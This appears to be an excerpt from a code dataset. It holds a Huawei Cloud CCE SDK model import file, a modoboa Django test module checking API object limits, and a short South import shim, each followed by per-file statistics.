| 34.688889 | 76 | 0.586963 | 899 | 6,244 | 3.89099 | 0.093437 | 0.116352 | 0.111492 | 0.078045 | 0.867353 | 0.845912 | 0.818182 | 0.802744 | 0.722413 | 0.702973 | 0 | 0.051672 | 0.209641 | 6,244 | 179 | 77 | 34.882682 | 0.657143 | 0 | 0 | 0.604317 | 0 | 0 | 0.02066 | 0 | 0 | 0 | 0 | 0 | 0.136691 | 1 | 0.136691 | false | 0 | 0.014388 | 0 | 0.151079 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc92c7a83f311e4931133f7b99ae4f2015d176cb | 9,561 | py | Python | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/__init__.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
# import models into model package
from huaweicloudsdkcce.v3.model.addon_instance import AddonInstance
from huaweicloudsdkcce.v3.model.addon_instance_status import AddonInstanceStatus
from huaweicloudsdkcce.v3.model.addon_template import AddonTemplate
from huaweicloudsdkcce.v3.model.authenticating_proxy import AuthenticatingProxy
from huaweicloudsdkcce.v3.model.authentication import Authentication
from huaweicloudsdkcce.v3.model.awake_cluster_request import AwakeClusterRequest
from huaweicloudsdkcce.v3.model.awake_cluster_response import AwakeClusterResponse
from huaweicloudsdkcce.v3.model.cce_cluster_node_information import CCEClusterNodeInformation
from huaweicloudsdkcce.v3.model.cce_cluster_node_information_metadata import CCEClusterNodeInformationMetadata
from huaweicloudsdkcce.v3.model.cce_job import CCEJob
from huaweicloudsdkcce.v3.model.cce_job_metadata import CCEJobMetadata
from huaweicloudsdkcce.v3.model.cce_job_spec import CCEJobSpec
from huaweicloudsdkcce.v3.model.cce_job_status import CCEJobStatus
from huaweicloudsdkcce.v3.model.cert_duration import CertDuration
from huaweicloudsdkcce.v3.model.cluster_cert import ClusterCert
from huaweicloudsdkcce.v3.model.cluster_endpoints import ClusterEndpoints
from huaweicloudsdkcce.v3.model.cluster_information import ClusterInformation
from huaweicloudsdkcce.v3.model.cluster_information_spec import ClusterInformationSpec
from huaweicloudsdkcce.v3.model.cluster_metadata import ClusterMetadata
from huaweicloudsdkcce.v3.model.cluster_status import ClusterStatus
from huaweicloudsdkcce.v3.model.clusters import Clusters
from huaweicloudsdkcce.v3.model.container_network import ContainerNetwork
from huaweicloudsdkcce.v3.model.context import Context
from huaweicloudsdkcce.v3.model.contexts import Contexts
from huaweicloudsdkcce.v3.model.create_addon_instance_request import CreateAddonInstanceRequest
from huaweicloudsdkcce.v3.model.create_addon_instance_response import CreateAddonInstanceResponse
from huaweicloudsdkcce.v3.model.create_cloud_persistent_volume_claims_request import CreateCloudPersistentVolumeClaimsRequest
from huaweicloudsdkcce.v3.model.create_cloud_persistent_volume_claims_response import CreateCloudPersistentVolumeClaimsResponse
from huaweicloudsdkcce.v3.model.create_cluster_request import CreateClusterRequest
from huaweicloudsdkcce.v3.model.create_cluster_response import CreateClusterResponse
from huaweicloudsdkcce.v3.model.create_kubernetes_cluster_cert_request import CreateKubernetesClusterCertRequest
from huaweicloudsdkcce.v3.model.create_kubernetes_cluster_cert_response import CreateKubernetesClusterCertResponse
from huaweicloudsdkcce.v3.model.create_node_pool_request import CreateNodePoolRequest
from huaweicloudsdkcce.v3.model.create_node_pool_response import CreateNodePoolResponse
from huaweicloudsdkcce.v3.model.create_node_request import CreateNodeRequest
from huaweicloudsdkcce.v3.model.create_node_response import CreateNodeResponse
from huaweicloudsdkcce.v3.model.delete_addon_instance_request import DeleteAddonInstanceRequest
from huaweicloudsdkcce.v3.model.delete_addon_instance_response import DeleteAddonInstanceResponse
from huaweicloudsdkcce.v3.model.delete_cloud_persistent_volume_claims_request import DeleteCloudPersistentVolumeClaimsRequest
from huaweicloudsdkcce.v3.model.delete_cloud_persistent_volume_claims_response import DeleteCloudPersistentVolumeClaimsResponse
from huaweicloudsdkcce.v3.model.delete_cluster_request import DeleteClusterRequest
from huaweicloudsdkcce.v3.model.delete_cluster_response import DeleteClusterResponse
from huaweicloudsdkcce.v3.model.delete_node_pool_request import DeleteNodePoolRequest
from huaweicloudsdkcce.v3.model.delete_node_pool_response import DeleteNodePoolResponse
from huaweicloudsdkcce.v3.model.delete_node_request import DeleteNodeRequest
from huaweicloudsdkcce.v3.model.delete_node_response import DeleteNodeResponse
from huaweicloudsdkcce.v3.model.delete_status import DeleteStatus
from huaweicloudsdkcce.v3.model.eni_network import EniNetwork
from huaweicloudsdkcce.v3.model.hibernate_cluster_request import HibernateClusterRequest
from huaweicloudsdkcce.v3.model.hibernate_cluster_response import HibernateClusterResponse
from huaweicloudsdkcce.v3.model.host_network import HostNetwork
from huaweicloudsdkcce.v3.model.instance_request import InstanceRequest
from huaweicloudsdkcce.v3.model.instance_request_spec import InstanceRequestSpec
from huaweicloudsdkcce.v3.model.instance_spec import InstanceSpec
from huaweicloudsdkcce.v3.model.list_addon_instances_request import ListAddonInstancesRequest
from huaweicloudsdkcce.v3.model.list_addon_instances_response import ListAddonInstancesResponse
from huaweicloudsdkcce.v3.model.list_addon_templates_request import ListAddonTemplatesRequest
from huaweicloudsdkcce.v3.model.list_addon_templates_response import ListAddonTemplatesResponse
from huaweicloudsdkcce.v3.model.list_clusters_request import ListClustersRequest
from huaweicloudsdkcce.v3.model.list_clusters_response import ListClustersResponse
from huaweicloudsdkcce.v3.model.list_node_pools_request import ListNodePoolsRequest
from huaweicloudsdkcce.v3.model.list_node_pools_response import ListNodePoolsResponse
from huaweicloudsdkcce.v3.model.list_nodes_request import ListNodesRequest
from huaweicloudsdkcce.v3.model.list_nodes_response import ListNodesResponse
from huaweicloudsdkcce.v3.model.login import Login
from huaweicloudsdkcce.v3.model.master_spec import MasterSpec
from huaweicloudsdkcce.v3.model.metadata import Metadata
from huaweicloudsdkcce.v3.model.nic_spec import NicSpec
from huaweicloudsdkcce.v3.model.node_management import NodeManagement
from huaweicloudsdkcce.v3.model.node_metadata import NodeMetadata
from huaweicloudsdkcce.v3.model.node_nic_spec import NodeNicSpec
from huaweicloudsdkcce.v3.model.node_pool import NodePool
from huaweicloudsdkcce.v3.model.node_pool_metadata import NodePoolMetadata
from huaweicloudsdkcce.v3.model.node_pool_node_autoscaling import NodePoolNodeAutoscaling
from huaweicloudsdkcce.v3.model.node_pool_spec import NodePoolSpec
from huaweicloudsdkcce.v3.model.node_pool_status import NodePoolStatus
from huaweicloudsdkcce.v3.model.persistent_volume_claim import PersistentVolumeClaim
from huaweicloudsdkcce.v3.model.persistent_volume_claim_metadata import PersistentVolumeClaimMetadata
from huaweicloudsdkcce.v3.model.persistent_volume_claim_spec import PersistentVolumeClaimSpec
from huaweicloudsdkcce.v3.model.persistent_volume_claim_status import PersistentVolumeClaimStatus
from huaweicloudsdkcce.v3.model.resource_requirements import ResourceRequirements
from huaweicloudsdkcce.v3.model.resource_tag import ResourceTag
from huaweicloudsdkcce.v3.model.runtime import Runtime
from huaweicloudsdkcce.v3.model.show_addon_instance_request import ShowAddonInstanceRequest
from huaweicloudsdkcce.v3.model.show_addon_instance_response import ShowAddonInstanceResponse
from huaweicloudsdkcce.v3.model.show_cluster_metadata import ShowClusterMetadata
from huaweicloudsdkcce.v3.model.show_cluster_request import ShowClusterRequest
from huaweicloudsdkcce.v3.model.show_cluster_response import ShowClusterResponse
from huaweicloudsdkcce.v3.model.show_job_request import ShowJobRequest
from huaweicloudsdkcce.v3.model.show_job_response import ShowJobResponse
from huaweicloudsdkcce.v3.model.show_node_pool_request import ShowNodePoolRequest
from huaweicloudsdkcce.v3.model.show_node_pool_response import ShowNodePoolResponse
from huaweicloudsdkcce.v3.model.show_node_request import ShowNodeRequest
from huaweicloudsdkcce.v3.model.show_node_response import ShowNodeResponse
from huaweicloudsdkcce.v3.model.support_versions import SupportVersions
from huaweicloudsdkcce.v3.model.taint import Taint
from huaweicloudsdkcce.v3.model.templatespec import Templatespec
from huaweicloudsdkcce.v3.model.update_addon_instance_request import UpdateAddonInstanceRequest
from huaweicloudsdkcce.v3.model.update_addon_instance_response import UpdateAddonInstanceResponse
from huaweicloudsdkcce.v3.model.update_cluster_request import UpdateClusterRequest
from huaweicloudsdkcce.v3.model.update_cluster_response import UpdateClusterResponse
from huaweicloudsdkcce.v3.model.update_node_pool_request import UpdateNodePoolRequest
from huaweicloudsdkcce.v3.model.update_node_pool_response import UpdateNodePoolResponse
from huaweicloudsdkcce.v3.model.update_node_request import UpdateNodeRequest
from huaweicloudsdkcce.v3.model.update_node_response import UpdateNodeResponse
from huaweicloudsdkcce.v3.model.user import User
from huaweicloudsdkcce.v3.model.user_password import UserPassword
from huaweicloudsdkcce.v3.model.user_tag import UserTag
from huaweicloudsdkcce.v3.model.users import Users
from huaweicloudsdkcce.v3.model.v3_cluster import V3Cluster
from huaweicloudsdkcce.v3.model.v3_cluster_spec import V3ClusterSpec
from huaweicloudsdkcce.v3.model.v3_node import V3Node
from huaweicloudsdkcce.v3.model.v3_node_bandwidth import V3NodeBandwidth
from huaweicloudsdkcce.v3.model.v3_node_create_request import V3NodeCreateRequest
from huaweicloudsdkcce.v3.model.v3_node_eip_spec import V3NodeEIPSpec
from huaweicloudsdkcce.v3.model.v3_node_public_ip import V3NodePublicIP
from huaweicloudsdkcce.v3.model.v3_node_spec import V3NodeSpec
from huaweicloudsdkcce.v3.model.v3_node_status import V3NodeStatus
from huaweicloudsdkcce.v3.model.v3_volume import V3Volume
from huaweicloudsdkcce.v3.model.versions import Versions
from huaweicloudsdkcce.v3.model.volume_metadata import VolumeMetadata
| 75.283465 | 127 | 0.909424 | 1,096 | 9,561 | 7.713504 | 0.169708 | 0.300568 | 0.329193 | 0.400757 | 0.492075 | 0.428555 | 0.192335 | 0.054412 | 0.028862 | 0 | 0 | 0.01567 | 0.052191 | 9,561 | 126 | 128 | 75.880952 | 0.917237 | 0.004811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.008197 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d7c99a7d5a6fd6a64c5b7a7fa3886bc5a020ddd | 9,373 | py | Python | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | modoboa/limits/tests/test_api.py | vinaebizs/modoboa | fb1e7f4c023b7eb6be3aa77174bfa12fc653670e | [
"0BSD"
] | null | null | null | # coding: utf-8
"""Test cases for the limits extension."""
from django.core.urlresolvers import reverse
from rest_framework.authtoken.models import Token
from modoboa.admin.factories import populate_database
from modoboa.admin.models import Domain
from modoboa.core import factories as core_factories
from modoboa.core.models import User
from modoboa.lib import parameters
from modoboa.lib import tests as lib_tests
from .. import utils
class APIAdminLimitsTestCase(lib_tests.ModoAPITestCase):
"""Check that limits are used also by the API."""
@classmethod
def setUpTestData(cls):
"""Create test data."""
super(APIAdminLimitsTestCase, cls).setUpTestData()
for name, tpl in utils.get_user_limit_templates():
parameters.save_admin(
"DEFLT_USER_{}_LIMIT".format(name.upper()), 2)
populate_database()
cls.user = User.objects.get(username="admin@test.com")
cls.da_token = Token.objects.create(user=cls.user)
cls.reseller = core_factories.UserFactory(
username="reseller", groups=("Resellers", ),
)
cls.r_token = Token.objects.create(user=cls.reseller)
def test_domadmins_limit(self):
"""Check domain admins limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
limit = self.reseller.userobjectlimit_set.get(name="domain_admins")
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "DomainAdmins",
"password": "Toto1234",
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["username"] = "fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
user = User.objects.get(username="user@test.com")
domain = Domain.objects.get(name="test.com")
domain.add_admin(self.reseller)
url = reverse("external_api:account-detail", args=[user.pk])
data = {
"username": user.username,
"role": "DomainAdmins",
"password": "Toto1234",
"mailbox": {
"full_address": user.username,
"quota": user.mailbox.quota
}
}
response = self.client.put(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domains_limit(self):
"""Check domains limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
limit = self.reseller.userobjectlimit_set.get(name="domains")
url = reverse("external_api:domain-list")
data = {"name": "test3.com", "quota": 10}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["name"] = "test4.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "test5.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domain_aliases_limit(self):
"""Check domain aliases limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.r_token.key)
domain = Domain.objects.get(name="test.com")
domain.add_admin(self.reseller)
limit = self.reseller.userobjectlimit_set.get(name="domain_aliases")
url = reverse("external_api:domain_alias-list")
data = {"name": "dalias1.com", "target": domain.pk}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["name"] = "dalias2.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "dalias3.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_mailboxes_limit(self):
"""Check mailboxes limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.da_token.key)
limit = self.user.userobjectlimit_set.get(name="mailboxes")
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "SimpleUsers",
"password": "Toto1234",
"mailbox": {
"full_address": "fromapi@test.com",
"quota": 10
}
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["username"] = "fromapi2@test.com"
data["mailbox"]["full_address"] = "fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["username"] = "fromapi3@test.com"
data["mailbox"]["full_address"] = "fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_aliases_limit(self):
"""Check mailbox aliases limit."""
self.client.credentials(
HTTP_AUTHORIZATION='Token ' + self.da_token.key)
limit = self.user.userobjectlimit_set.get(name="mailbox_aliases")
url = reverse("external_api:alias-list")
data = {
"address": "alias_fromapi@test.com",
"recipients": [
"user@test.com", "postmaster@test.com", "user_éé@nonlocal.com"
]
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertFalse(limit.is_exceeded())
data["address"] = "alias_fromapi2@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["address"] = "alias_fromapi3@test.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
class APIDomainLimitsTestCase(lib_tests.ModoAPITestCase):
"""Check that limits are used also by the API."""
@classmethod
def setUpTestData(cls):
"""Create test data."""
super(APIDomainLimitsTestCase, cls).setUpTestData()
parameters.save_admin("ENABLE_DOMAIN_LIMITS", "yes")
for name, tpl in utils.get_domain_limit_templates():
parameters.save_admin(
"DEFLT_DOMAIN_{}_LIMIT".format(name.upper()), 2)
populate_database()
def test_mailboxes_limit(self):
"""Check mailboxes limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="mailboxes")
self.assertTrue(limit.is_exceeded())
url = reverse("external_api:account-list")
data = {
"username": "fromapi@test.com",
"role": "SimpleUsers",
"password": "Toto1234",
"mailbox": {
"full_address": "fromapi@test.com",
"quota": 10
}
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_domain_aliases_limit(self):
"""Check domain_aliases limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="domain_aliases")
url = reverse("external_api:domain_alias-list")
data = {"name": "dalias1.com", "target": domain.pk}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
data["name"] = "dalias2.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 201)
self.assertTrue(limit.is_exceeded())
data["name"] = "dalias3.com"
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
def test_mailbox_aliases_limit(self):
"""Check mailbox_aliases limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="mailbox_aliases")
self.assertTrue(limit.is_exceeded())
url = reverse("external_api:alias-list")
data = {
"address": "alias_fromapi@test.com",
"recipients": [
"user@test.com", "postmaster@test.com", "user_éé@nonlocal.com"
]
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
| 39.382353 | 78 | 0.621253 | 1,043 | 9,373 | 5.458293 | 0.126558 | 0.031969 | 0.066397 | 0.062709 | 0.835412 | 0.805024 | 0.762164 | 0.739329 | 0.720183 | 0.708765 | 0 | 0.01482 | 0.244105 | 9,373 | 237 | 79 | 39.548523 | 0.788709 | 0.040862 | 0 | 0.670157 | 0 | 0 | 0.164388 | 0.038436 | 0 | 0 | 0 | 0 | 0.17801 | 1 | 0.052356 | false | 0.020942 | 0.04712 | 0 | 0.109948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d3aa2b24de34ed5c43724015ce47ad1e4d045bc | 199 | py | Python | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | 1 | 2017-07-10T19:58:55.000Z | 2017-07-10T19:58:55.000Z | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | null | null | null | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | null | null | null | try:
from south.modelsinspector import add_ignored_fields
add_ignored_fields(["^taggit_autosuggest_select2\.managers"])
except ImportError:
pass # without south this can fail silently
| 28.428571 | 65 | 0.778894 | 24 | 199 | 6.208333 | 0.833333 | 0.134228 | 0.214765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.155779 | 199 | 6 | 66 | 33.166667 | 0.880952 | 0.180905 | 0 | 0 | 0 | 0 | 0.229814 | 0.229814 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.